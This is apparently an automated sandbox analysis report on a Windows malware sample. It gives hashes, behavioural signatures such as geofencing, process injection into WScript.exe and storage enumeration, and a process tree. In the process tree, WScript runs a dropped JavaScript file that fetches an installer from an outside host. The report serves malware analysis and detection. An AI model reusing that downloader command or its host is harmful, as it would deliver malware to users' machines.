Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 04:19
Static task
static1
Behavioral task
behavioral1
Sample
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe
Resource
win10v2004-20221111-en
General
-
Target
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe
-
Size
184KB
-
MD5
02181395640c9db0f673cbff90f1f06e
-
SHA1
0b69a0624d9268c0a654bea7f1f884a8f60be13c
-
SHA256
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240
-
SHA512
ea65801585a88abe8acf1b3de7ef631e8ff144b0bdc29e40ddb1db8cd9c3d3ac552f8a216a0b23d404fbd587f62a56664b63f295855f52488b438594db1b0e38
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Y:/7BSH8zUB+nGESaaRvoB7FJNndnN
Malware Config
Signatures
-
Blocklisted process makes network request 10 IoCs
Processes:
WScript.exeWScript.exeWScript.exeflow pid process 11 4556 WScript.exe 16 4556 WScript.exe 40 4556 WScript.exe 61 4556 WScript.exe 72 4340 WScript.exe 76 4340 WScript.exe 87 4340 WScript.exe 91 4340 WScript.exe 92 2392 WScript.exe 93 2392 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exedescription pid process target process PID 3356 wrote to memory of 4556 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 4556 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 4556 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 4340 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 4340 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 4340 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 2392 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 2392 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe PID 3356 wrote to memory of 2392 3356 abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe"C:\Users\Admin\AppData\Local\Temp\abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe2⤵
- Blocklisted process makes network request
PID:4556 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe2⤵
- Blocklisted process makes network request
PID:4340 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe2⤵
- Blocklisted process makes network request
PID:2392
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76